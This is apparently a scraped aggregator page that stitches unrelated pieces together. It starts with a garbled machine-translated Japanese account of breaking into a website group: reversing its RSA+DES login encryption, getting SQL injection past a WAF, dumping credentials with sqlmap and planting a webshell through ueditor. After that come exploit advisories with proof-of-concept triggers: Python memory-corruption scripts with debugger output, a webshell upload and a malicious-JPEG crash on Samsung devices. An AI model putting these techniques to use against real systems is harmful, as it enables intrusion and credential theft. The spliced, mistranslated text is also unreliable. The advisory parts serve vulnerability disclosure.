渡されたパスワードはRSAタイプであり、RSA復号化が最初に実行され、次にDES暗号化が実行されることがわかります。

Desencrypt.Encryptメソッドを追跡します。1049983-20220106103934466-1892231958.png

カプセル化され、暗号化されたキーに渡された暗号化メソッドは次のとおりです。

そのコア暗号化方法は次のとおりです。1049983-20220106103934918-1778582804.png

そして、このカテゴリで。また、復号化方法1049983-20220106103935511-1781289920.pngも定義します

暗号化方法と復号化方法とキーが取得されます。その後、それを引き出して別々に呼び出す必要があります。1049983-20220106103936101-1935894672.png

暗号化された文字を復号化し、結果を取得します1049983-20220106103936660-850388884.png

1049983-20220106103938164-373416304.pngにログインしてみてください

私は長い間一生懸命働いていましたが、それは無駄でした。

0x03暗いヤナギと花がターゲットシェルを獲得します

すでに午後4時です。まだ進歩がなく、SQLフィルタリングをバイパスしようとする準備ができています。

現時点では、SQL注入ポイントが見つかりました。1049983-20220106103938695-190719613.png

メソッドは2つのパラメーターを受信しますが、1つのパラメーターのみをフィルターします。

ターゲットWebサイト1049983-20220106103939091-740130853.pngのクイズ

既存の注入では、WAFがゴミパラメーターで正常に満たされていることがわかりました。

1049983-20220106103939954-426082430.png

sqlmapにアクセスして心の安らぎで実行し、システムアカウントとパスワードを入手してください1049983-20220106103940604-42722927.png

取得した暗号文を復号化して結果を取得します

1049983-20220106103941431-713547984.png

ログインしてみてください。今、そうです!1049983-20220106103941866-739496859.png

ついに来てください!

以前の監査の後、多くのインターフェイスが脆弱性を持っていることがわかっており、今ではログインしていることに成功しています。

ueditorで直接それを奪ってください。1049983-20220106103942350-1890359523.png

シェルが成功しました

0x04要約

1。ターゲットURLの後に管理者に管理バックエンドを表示する管理者に追加し、Webサイトの下部にあるWebサイトのCMS情報を照会します。2。 Webサイトの1つがソースコード圧縮パッケージのリークを持っていることがわかりました。5。Webサイトのソースコードのローカルコード監査を実行し、ASHX/API.ASHXにログインする脆弱性があります。では、SQLインジェクションの脆弱性があり、ログインする必要があり、フィルタリングされます6。 7。WebShellを通じて、サイトグループの各WebサイトのルートディレクトリにZIP WebサイトのバックアップとSQLがあることがわかります。データベースバックアップ、SQLステートメントには、挿入されたユーザー名とパスワードが含まれています(パスワードは33桁です)。サイトグループのすべてのログインは、基本的に同じユーザー名とパスワードを使用します。 8。ソースコード分析により、ログインがRSA+DESを介して暗号化され、暗号化方法とキー値がソースコードで見つかったことがわかりました。 10。ソースコードの暗号化方法を介して復号化方法を記述し、ハッシュ値を復号化しますが、ログインすることは不可能です。11をログインすることは不可能です。ソースコード監査により、別のSQLインジェクションが見つかりました。ここで、WAFはガベージ充填データを介してユーザー名を傍受および注入し、SQLMapを介してユーザー名を実行します。上記の復号化方法を介して、パスワードハッシュ値が復号化され、プレーンテキストパスワードが最終的に取得されます。 12。取得したユーザー名とパスワードを介してシステムにログインし、ueditorエディターのリモートファイルダウンロードを介してターゲットシステムの元のWebshellリンクを取得します:https://xz.aliyun.com/t/8375

HireHackking 
Title: Python 3.3 - 3.5 product_setstate() Out-of-bounds Read
Credit: John Leitch (john@autosectools.com), Bryce Darling (darlingbryce@gmail.com)
Url1: http://autosectools.com/Page/Python-product_setstate-Out-of-bounds-Read
Url2: http://bugs.python.org/issue25021
Resolution: Fixed

Python 3.3 - 3.5 suffer from a vulnerability caused by the behavior of the product_setstate() function. When called, the function loops over the state tuple provided and clamps each given index to a value within a range from 0 up to the max number of pools. Then, it loops over the pools and gets an item from the pool using the previously clamped index value.

However, for the upper bound, the clamping logic is using the number of pools and not the size of the individual pool, which can result in a call to PyTuple_GET_ITEM that uses an index outside of the bounds of the pool:

    for (i=0; i n-1)
            index = n-1;
        lz->indices[i] = index;
    }

    result = PyTuple_New(n);
    if (!result)
        return NULL;
    for (i=0; ipools, i);
        PyObject *element = PyTuple_GET_ITEM(pool, lz->indices[i]);
        Py_INCREF(element);
        PyTuple_SET_ITEM(result, i, element);
    }
    
The invalid result of the PyTyple_GET_ITEM() expression is then passed to Py_INCREF(), which performs a write operation that corrupts memory.

In some applications, it may be possible to exploit this behavior to corrupt sensitive information, crash, or achieve code execution. The out-of-bounds write can be observed by running the following script:

import itertools

p = itertools.product((0,),(0,))
p.__setstate__((0, 1))

Which, depending on the arrangement of memory, may produce an exception such as this:

0:000> g
(ea4.11a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c962 ebx=059e8f80 ecx=00000000 edx=00000000 esi=004af564 edi=05392f78
eip=613211eb esp=004af4d0 ebp=004af4f8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
python35_d!product_setstate+0x13b:
613211eb 8b5108          mov     edx,dword ptr [ecx+8] ds:002b:00000008=????????
0:000> k1
ChildEBP RetAddr  
004af4f8 61553a22 python35_d!product_setstate+0x13b [c:\source\python-3.5.0b3\modules\itertoolsmodule.c @ 2266]

In some cases, EIP corruption may occur:

0:000> r
eax=00000000 ebx=03e0f790 ecx=6d2ad658 edx=00000002 esi=03e0f790 edi=6d0dbb20
eip=00000000 esp=004cf6a0 ebp=004cf6ac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
00000000 ??              ???
0:000> k4
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
004cf69c 6d08a390 0x0
004cf6ac 6d02b688 python35!PyIter_Next+0x10
004cf6c0 6d0dbb6e python35!chain_next+0x58
004cf6d0 6d0a021d python35!wrap_next+0x4e

To fix this issue, it is recommended that product_setstate() be updated to clamp indices within a range from 0 up to the size of the pool in the body of the result tuple building loop.
HireHackking 
Title: Python 2.7 strop.replace() Integer Overflow
Credit: John Leitch (john@autosectools.com)
Url1: http://autosectools.com/Page/Python-strop-replace-Integer-Overflow
Url2: http://bugs.python.org/issue24708
Resolution: Fixed

The Python 2.7 strop.replace() method suffers from an integer overflow that can be exploited to write outside the bounds of the string buffer and potentially achieve code execution. The issue can be triggered by performing a large substitution that overflows the arithmetic used in mymemreplace() to calculate the size of the new string:

static char *
mymemreplace(const char *str, Py_ssize_t len,           /* input string */
         const char *pat, Py_ssize_t pat_len,           /* pattern string to find */
         const char *sub, Py_ssize_t sub_len,           /* substitution string */
         Py_ssize_t count,                              /* number of replacements */
         Py_ssize_t *out_len)
{
    [...]

    new_len = len + nfound*(sub_len - pat_len); <<<< Unchecked arithmetic can overflow here.
    if (new_len == 0) {
        /* Have to allocate something for the caller to free(). */
        out_s = (char *)PyMem_MALLOC(1);
        if (out_s == NULL)
            return NULL;
        out_s[0] = '\0';
    }
    else {
        assert(new_len > 0);
        new_s = (char *)PyMem_MALLOC(new_len); <<<< An allocation is performed using overflowed value.
        if (new_s == NULL)
            return NULL;
        out_s = new_s;

        for (; count > 0 && len > 0; --count) { <<<< Memory is copied to new_s using len, which can be greater than the overflowed new_len value.
            /* find index of next instance of pattern */
            offset = mymemfind(str, len, pat, pat_len);
            if (offset == -1)
                break;

            /* copy non matching part of input string */
            memcpy(new_s, str, offset);
            str += offset + pat_len;
            len -= offset + pat_len;

            /* copy substitute into the output string */
            new_s += offset;
            memcpy(new_s, sub, sub_len);
            new_s += sub_len;
        }
        /* copy any remaining values into output string */
        if (len > 0)
            memcpy(new_s, str, len);
    }
    [...]
}

The following script demonstrates the issue:

import strop
strop.replace("\x75"*0xEAAA,"\x75","AA"*0xAAAA)
When run under a debugger, it produces the following exception:

0:000> r
eax=01e4cfd0 ebx=5708fc94 ecx=00003c7a edx=00000000 esi=01e3dde8 edi=57096000
eip=7026ae7a esp=0027fc98 ebp=0027fca0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
MSVCR90!memcpy+0x5a:
7026ae7a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> db edi-0x10
57095ff0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
57096000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:000> db esi
01e3dde8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3ddf8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de08  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de18  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de28  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de38  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de48  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de58  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000> k
ChildEBP RetAddr  
0027fca0 1e056efc MSVCR90!memcpy+0x5a [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 188]
0027fcd0 1e05700b python27!mymemreplace+0xfc [c:\build27\cpython\modules\stropmodule.c @ 1139]
0027fd18 1e0aaed7 python27!strop_replace+0xbb [c:\build27\cpython\modules\stropmodule.c @ 1185]
0027fd30 1e0edcc0 python27!PyCFunction_Call+0x47 [c:\build27\cpython\objects\methodobject.c @ 81]
0027fd5c 1e0f012a python27!call_function+0x2b0 [c:\build27\cpython\python\ceval.c @ 4035]
0027fdcc 1e0f1100 python27!PyEval_EvalFrameEx+0x239a [c:\build27\cpython\python\ceval.c @ 2684]
0027fe00 1e0f1162 python27!PyEval_EvalCodeEx+0x690 [c:\build27\cpython\python\ceval.c @ 3267]
0027fe2c 1e1170ca python27!PyEval_EvalCode+0x22 [c:\build27\cpython\python\ceval.c @ 674]
0027fe44 1e118215 python27!run_mod+0x2a [c:\build27\cpython\python\pythonrun.c @ 1371]
0027fe64 1e1187b0 python27!PyRun_FileExFlags+0x75 [c:\build27\cpython\python\pythonrun.c @ 1358]
0027fea4 1e119129 python27!PyRun_SimpleFileExFlags+0x190 [c:\build27\cpython\python\pythonrun.c @ 950]
0027fec0 1e038cb5 python27!PyRun_AnyFileExFlags+0x59 [c:\build27\cpython\python\pythonrun.c @ 753]
0027ff3c 1d00116d python27!Py_Main+0x965 [c:\build27\cpython\modules\main.c @ 643]
0027ff80 74b97c04 python!__tmainCRTStartup+0x10f [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 586]
0027ff94 7701ad1f KERNEL32!BaseThreadInitThunk+0x24
0027ffdc 7701acea ntdll!__RtlUserThreadStart+0x2f
0027ffec 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> !analyze -v -nodb
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP: 
MSVCR90!memcpy+5a [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 188]
7026ae7a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 7026ae7a (MSVCR90!memcpy+0x0000005a)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 57096000
Attempt to write to address 57096000

CONTEXT:  00000000 -- (.cxr 0x0;r)
eax=01e4cfd0 ebx=5708fc94 ecx=00003c7a edx=00000000 esi=01e3dde8 edi=57096000
eip=7026ae7a esp=0027fc98 ebp=0027fca0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
MSVCR90!memcpy+0x5a:
7026ae7a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

FAULTING_THREAD:  00001408

PROCESS_NAME:  python.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  57096000

WRITE_ADDRESS:  57096000 

FOLLOWUP_IP: 
MSVCR90!memcpy+5a [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 188]
7026ae7a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

NTGLOBALFLAG:  470

APPLICATION_VERIFIER_FLAGS:  0

APP:  python.exe

ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) x86fre

BUGCHECK_STR:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_FILL_PATTERN_NXCODE

PRIMARY_PROBLEM_CLASS:  STRING_DEREFERENCE_FILL_PATTERN_NXCODE

DEFAULT_BUCKET_ID:  STRING_DEREFERENCE_FILL_PATTERN_NXCODE

LAST_CONTROL_TRANSFER:  from 1e056efc to 7026ae7a

STACK_TEXT:  
0027fca0 1e056efc 5708fc94 01e37a7c 00015554 MSVCR90!memcpy+0x5a
0027fcd0 1e05700b 01e2ba4e 38e171c8 01d244cc python27!mymemreplace+0xfc
0027fd18 1e0aaed7 00000000 01cebe40 01de2c38 python27!strop_replace+0xbb
0027fd30 1e0edcc0 01de2c38 01cebe40 00000000 python27!PyCFunction_Call+0x47
0027fd5c 1e0f012a 0027fdb4 01ce6c80 01ce6c80 python27!call_function+0x2b0
0027fdcc 1e0f1100 01ddd9d0 00000000 01ce6c80 python27!PyEval_EvalFrameEx+0x239a
0027fe00 1e0f1162 01ce6c80 01ddd9d0 01ceaa50 python27!PyEval_EvalCodeEx+0x690
0027fe2c 1e1170ca 01ce6c80 01ceaa50 01ceaa50 python27!PyEval_EvalCode+0x22
0027fe44 1e118215 01dca090 01ceaa50 01ceaa50 python27!run_mod+0x2a
0027fe64 1e1187b0 702c7408 00342ebb 00000101 python27!PyRun_FileExFlags+0x75
0027fea4 1e119129 702c7408 00342ebb 00000001 python27!PyRun_SimpleFileExFlags+0x190
0027fec0 1e038cb5 702c7408 00342ebb 00000001 python27!PyRun_AnyFileExFlags+0x59
0027ff3c 1d00116d 00000002 00342e98 00341950 python27!Py_Main+0x965
0027ff80 74b97c04 7ffde000 74b97be0 b4e726fd python!__tmainCRTStartup+0x10f
0027ff94 7701ad1f 7ffde000 b723218a 00000000 KERNEL32!BaseThreadInitThunk+0x24
0027ffdc 7701acea ffffffff 77000212 00000000 ntdll!__RtlUserThreadStart+0x2f
0027ffec 00000000 1d001314 7ffde000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  .cxr 0x0 ; kb

FAULTING_SOURCE_LINE:  f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm

FAULTING_SOURCE_FILE:  f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm

FAULTING_SOURCE_LINE_NUMBER:  188

FAULTING_SOURCE_CODE:  
No source found for 'f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm'


SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  msvcr90!memcpy+5a

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: MSVCR90

IMAGE_NAME:  MSVCR90.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  51ea24a5

FAILURE_BUCKET_ID:  STRING_DEREFERENCE_FILL_PATTERN_NXCODE_c0000005_MSVCR90.dll!memcpy

BUCKET_ID:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_FILL_PATTERN_NXCODE_msvcr90!memcpy+5a

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:string_dereference_fill_pattern_nxcode_c0000005_msvcr90.dll!memcpy

FAILURE_ID_HASH:  {031149d8-0626-9042-d8b7-a1766b1c5514}

Followup: MachineOwner
---------

To fix the issue, mymemreplace should validate that the computed value new_len has not overflowed. To do this, (new_len - len) / nfound should be compared to sub_len - pat_len. If that are not equal, an overflow has occurred.
HireHackking 
source: https://www.securityfocus.com/bid/60847/info

Mobile USB Drive HD is prone to multiple local file-include and arbitrary file-upload vulnerabilities because it fails to adequately validate files before uploading them.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

Mobile USB Drive HD 1.2 is vulnerable; other versions may also be affected. 

<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead>
<tbody id="filelist">
<tr><td><a href=_http://www.example.com/files/webshell-js.php.png.txt.iso.php.gif; 
class="file">webshell-js.php.png.txt.iso.php.gif</a></td>
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=495

The attached JPEG file causes memory corruption the DCMProvider service when the file is processed by the media scanner, leading to the following crash:

quaramip.jpg:

I/DEBUG   ( 2962): pid: 19350, tid: 19468, name: HEAVY#0  >>> com.samsung.dcm:DCMService <<<
I/DEBUG   ( 2962): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x8080808080808080
I/DEBUG   ( 2962):     x0   0000007f97afd000  x1   0000007f98118650  x2   0000007f9811eaa8  x3   0000007f9815a430
I/DEBUG   ( 2962):     x4   8080808080808080  x5   0000007f9811eaa8  x6   0000000000000000  x7   0000000000000003
I/DEBUG   ( 2962):     x8   0000000000000050  x9   0000000000000005  x10  0000000000000053  x11  0000007f9815a470
I/DEBUG   ( 2962):     x12  0000007f97803920  x13  0000007f978ff050  x14  0000007f983fea40  x15  0000000000000001
I/DEBUG   ( 2962):     x16  0000007faabefae0  x17  0000007faf708880  x18  0000007faf77da40  x19  0000007f97afd000
I/DEBUG   ( 2962):     x20  00000000ffffffff  x21  0000000000000001  x22  0000007f9815a410  x23  0000007f981588f0
I/DEBUG   ( 2962):     x24  0000007f983feb44  x25  0000007f983feb48  x26  ffffffffffffffe8  x27  0000007f98118600
I/DEBUG   ( 2962):     x28  0000007f98177800  x29  000000000000001c  x30  0000007faabb8ff8
I/DEBUG   ( 2962):     sp   0000007f983fea50  pc   8080808080808080  pstate 0000000000000000
I/DEBUG   ( 2962): 
I/DEBUG   ( 2962): backtrace:
I/DEBUG   ( 2962):     #00 pc 8080808080808080  <unknown>
I/DEBUG   ( 2962):     #01 pc 00000000000000a6  <unknown>

quaramfree.jpg:

I/DEBUG   ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x808080808000d0
I/DEBUG   ( 2956):     x0   0000000000008080  x1   0000007f89d03720  x2   00000000000fffff  x3   8080808080800000
I/DEBUG   ( 2956):     x4   0000000000000008  x5   0000007f89cf2000  x6   0000007f89d03758  x7   0000000000000002
I/DEBUG   ( 2956):     x8   0000000000000006  x9   0000000000000012  x10  8080808080800090  x11  0000007f803015d8
I/DEBUG   ( 2956):     x12  0000000000000013  x13  0000007f89cf2000  x14  0000007f89d00000  x15  00000000000014a4
I/DEBUG   ( 2956):     x16  0000007f850eec00  x17  0000007f89c4e17c  x18  0000007f89d037f8  x19  8080808080808080
I/DEBUG   ( 2956):     x20  0000007f8031e618  x21  0000007f89cf2000  x22  0000000000000001  x23  0000007f803166d8
I/DEBUG   ( 2956):     x24  0000007f80331170  x25  0000000000000010  x26  00000000000001f4  x27  fffffffffffffffc
I/DEBUG   ( 2956):     x28  000000000000007d  x29  0000007f84efea60  x30  0000007f89c4e194
I/DEBUG   ( 2956):     sp   0000007f84efea60  pc   0000007f89cae0b4  pstate 0000000020000000
I/DEBUG   ( 2956): 
I/DEBUG   ( 2956): backtrace:
I/DEBUG   ( 2956):     #00 pc 00000000000790b4  /system/lib64/libc.so (je_free+92)
I/DEBUG   ( 2956):     #01 pc 0000000000019190  /system/lib64/libc.so (free+20)
I/DEBUG   ( 2956):     #02 pc 000000000003e8a0  /system/lib64/libQjpeg.so (WINKJ_DeleteDecoderInfo+1076)
I/DEBUG   ( 2956):     #03 pc 00000000000427b0  /system/lib64/libQjpeg.so (WINKJ_DecodeImage+2904)
I/DEBUG   ( 2956):     #04 pc 00000000000428d4  /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG   ( 2956):     #05 pc 0000000000042a08  /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG   ( 2956):     #06 pc 000000000004420c  /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG   ( 2956):     #07 pc 00000000000a4234  /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG   ( 2956):     #08 pc 0000000000001b98  /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG   ( 2956):     #09 pc 0000000000001418  /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG   ( 2956):     #10 pc 00000000000018ec  /system/framework/arm64/saiv.odex

The pc is set to the value of content of the JPEG file, indicating that this issue could probably be exploited to allow code execution. We believe the issue is caused due to a flaw in libQjpeg.so (third-party Quram Qjpeg library).

To reproduce the issue, download the file and wait for media scanning to occur, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0

This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38614.zip